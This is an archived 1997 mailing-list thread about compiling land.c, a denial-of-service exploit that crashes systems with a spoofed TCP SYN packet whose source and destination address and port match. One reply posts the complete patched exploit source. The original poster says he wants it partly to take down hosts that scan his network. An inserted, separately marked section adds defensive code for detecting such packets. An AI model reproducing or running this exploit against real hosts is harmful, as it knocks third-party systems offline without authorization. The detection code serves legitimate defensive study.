Re: Compiling land.c

1997-11-28 Thread Adam Shand
> The published land.c doesn't compile cleanly with libc6 under linux.
> It's just a trivial job patching it to work right; here's the fixed
> source code:

Thanks kindly, I figured that's what it was (eventually) but my C skills
are not that good unfortunately.

Thanks for the code.

Adam.

 Internet Alaska --
 4050 Lake Otis Adam  Shand(v) +1 907 562 4638
 Anchorage, Alaska Systems Administrator   (f) +1 907 562 1677
- http://larry.earthlight.co.nz ---



--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
[EMAIL PROTECTED] . 
Trouble?  e-mail to [EMAIL PROTECTED] .


Re: Compiling land.c

1997-11-28 Thread Adam Shand
> Why do you need to compile this program?

Because I have a bunch of FreeBSD boxes that I need to make sure are no
longer vulnerable, and because I want a way of taking down boxes which
insist on aggressively strobing our network and setting off my pager :)

> If you want to find out whether your linux is vulnerable, just upgrade
> your linux to 2.0.32.

That's Teardrop and the Pentium f00f bug... linux isn't vulnerable to this
attack.

Adam.

 Internet Alaska --
 4050 Lake Otis Adam  Shand(v) +1 907 562 4638
 Anchorage, Alaska Systems Administrator   (f) +1 907 562 1677
- http://larry.earthlight.co.nz ---





Re: Compiling land.c

1997-11-27 Thread Elie Rosenblum
And thus spake Adam Shand, on Thu, Nov 27, 1997 at 01:07:53AM -0900:
> Hopefully a quick question.  I'm trying to compile land.c (as in the
> exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
> netinet/protocols.h.
> 
> I've searched my hard drive and I don't have these files anywhere (and I
> have kernel sources installed and most of the -dev packages) and I would
> like to get this compiled. 
> 
> Can someone point me to the right place?

The published land.c doesn't compile cleanly with libc6 under linux.
It's just a trivial job patching it to work right; here's the fixed
source code:


/* land.c by m3lt, FLC
   crashes a win95 box */
/* patched for linux/libc6+debian */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define __FAVOR_BSD
#include 

struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;

for(i=0;i<(length>>1);i++)
value+=data[i];

if((length&1)==1)
value+=(data[i]<<8);

value=(value&65535)+(value>>16);

return(~value);
}

int main(int argc,char * * argv)
{
struct sockaddr_in sin;
struct hostent * hoste;
int sock;
char buffer[40];
struct iphdr * ipheader=(struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct 
iphdr));
struct pseudohdr pseudoheader;

fprintf(stderr,"land.c by m3lt, FLC\n");

if(argc<3)
{
fprintf(stderr,"usage: %s IP port\n",argv[0]);
return(-1);
}

bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;

if((hoste=gethostbyname(argv[1]))!=NULL)
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
{
fprintf(stderr,"unknown host %s\n",argv[1]);
return(-1);
}

if((sin.sin_port=htons(atoi(argv[2])))==0)
{
fprintf(stderr,"unknown port %s\n",argv[2]);
return(-1);
}

if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
fprintf(stderr,"couldn't allocate raw socket\n");
return(-1);
}

bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->ttl=255;
ipheader->protocol=IPPROTO_TCP;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;

tcpheader->th_sport=sin.sin_port;
tcpheader->th_dport=sin.sin_port;
tcpheader->th_seq=htonl(0xF1C);
tcpheader->th_flags=TH_SYN;
tcpheader->th_off=sizeof(struct tcphdr)/4;
tcpheader->th_win=htons(2048);

bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol=6;
pseudoheader.length=htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct 
tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct 
tcphdr));

if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct 
tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
{
fprintf(stderr,"couldn't send packet\n");
return(-1);
}

fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

close(sock);
return(0);
}

-- 
Elie Rosenblum <[EMAIL PROTECTED]>   That is not dead which can eternal lie,
 <[EMAIL PROTECTED]>  And with strange aeons even death may die.
Developer / Mercenary / System Administrator - _The Necromicon_
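
The check a packet filter or IDS applies to the packet that land.c builds (source address equal to destination address, source port equal to destination port, SYN set), as an added example that is not part of the original thread. The function names, addresses and ports are constructed for illustration; the sample packets exist only in memory.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { LAND_MALFORMED = -1, LAND_NO = 0, LAND_YES = 1 };
/* Classify one raw IPv4 packet, starting at the IP header. */
int classify_land(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return LAND_MALFORMED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;        /* IP header length, bytes */
    if (ihl < 20 || len < ihl)
        return LAND_MALFORMED;
    unsigned frag_off = ((pkt[6] & 0x1fu) << 8) | pkt[7];
    if (pkt[9] != 6 || frag_off != 0)                /* not TCP, or no TCP header here */
        return LAND_NO;
    if (len < ihl + 20)                              /* truncated TCP header */
        return LAND_MALFORMED;
    const uint8_t *tcp = pkt + ihl;
    int same_addr = memcmp(pkt + 12, pkt + 16, 4) == 0;   /* saddr == daddr */
    int same_port = memcmp(tcp, tcp + 2, 2) == 0;         /* th_sport == th_dport */
    int syn = (tcp[13] & 0x02) != 0;                      /* TH_SYN */
    return (same_addr && same_port && syn) ? LAND_YES : LAND_NO;
}

/* Constructed sample input: fills a 40-byte buffer in memory; nothing is sent. */
size_t sample_packet(uint8_t buf[40], const uint8_t src[4], const uint8_t dst[4],
                     uint16_t sport, uint16_t dport, uint8_t flags)
{
    memset(buf, 0, 40);
    buf[0] = 0x45; buf[3] = 40; buf[8] = 64; buf[9] = 6;  /* IPv4, IHL 5, TCP */
    memcpy(buf + 12, src, 4); memcpy(buf + 16, dst, 4);
    buf[20] = sport >> 8; buf[21] = sport & 0xff;
    buf[22] = dport >> 8; buf[23] = dport & 0xff;
    buf[32] = 0x50;                                       /* TCP data offset 5 */
    buf[33] = flags;
    return 40;
}

int main(void)
{
    const uint8_t a[4] = {192, 0, 2, 10}, b[4] = {192, 0, 2, 20};  /* RFC 5737 */
    uint8_t p[40];
    size_t n = sample_packet(p, a, a, 80, 80, 0x02);
    printf("same addr/port SYN: %d\n", classify_land(p, n));
    n = sample_packet(p, b, a, 40000, 80, 0x02);
    printf("ordinary SYN:       %d\n", classify_land(p, n));
    return 0;
}
```

A border filter would normally drop any inbound packet whose source address equals its destination address; the port and SYN tests here only narrow the match to the exact packet shape in the posted source.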




Re: Compiling land.c

1997-11-27 Thread Kevin Traas
>> >   I'm trying to compile land.c (as in the exploit) ...
>> Why do you need to compile this program?
>BTW, linux is NOT vulnerable to this attack.  Even version 1.2.13.

Kudos to Linux!!!

Makes me proud to be a Linux user/supporter

Later,
Kevin





Re: Compiling land.c

1997-11-27 Thread Kevin Traas
>> >   I'm trying to compile land.c (as in the exploit) ...
>> Why do you need to compile this program?
>BTW, linux is NOT vulnerable to this attack.  Even version 1.2.13.

Kudos to Linux!!!

Makes me proud!

Later,
Kevin




Re: Compiling land.c

1997-11-27 Thread Alair Pereira do Lago
Lawrence <[EMAIL PROTECTED]> writes:

> Adam Shand wrote:
> > 
> > Hey,
> > 
> > Hopefully a quick question.  I'm trying to compile land.c (as in the
> > exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
> > netinet/protocols.h.
> 
> Why do you need to compile this program?
> If you want to find out whether your linux is vulnerable, just upgrade
> your linux to 2.0.32.

BTW, linux is NOT vulnerable to this attack.  Even version 1.2.13.

see 

for a complete list of vulnerable systems.

It includes *BSD, NT, SCO, SunOS but not solaris 

-- 
Alair Pereira do Lago  <[EMAIL PROTECTED]> 
Computer Science Department -- Universidade de S~ao Paulo -- Brazil




Re: Compiling land.c

1997-11-27 Thread Lawrence
Adam Shand wrote:
> 
> Hey,
> 
> Hopefully a quick question.  I'm trying to compile land.c (as in the
> exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
> netinet/protocols.h.

Why do you need to compile this program?
If you want to find out whether your linux is vulnerable, just upgrade
your linux to 2.0.32.

Lawrence




Compiling land.c

1997-11-27 Thread Adam Shand

Hey,

Hopefully a quick question.  I'm trying to compile land.c (as in the
exploit) and it bombs out on me because it can't find netinet/ip_tcp.h and
netinet/protocols.h.

I've searched my hard drive and I don't have these files anywhere (and I
have kernel sources installed and most of the -dev packages) and I would
like to get this compiled. 

Can someone point me to the right place?

Thanks,

Adam.

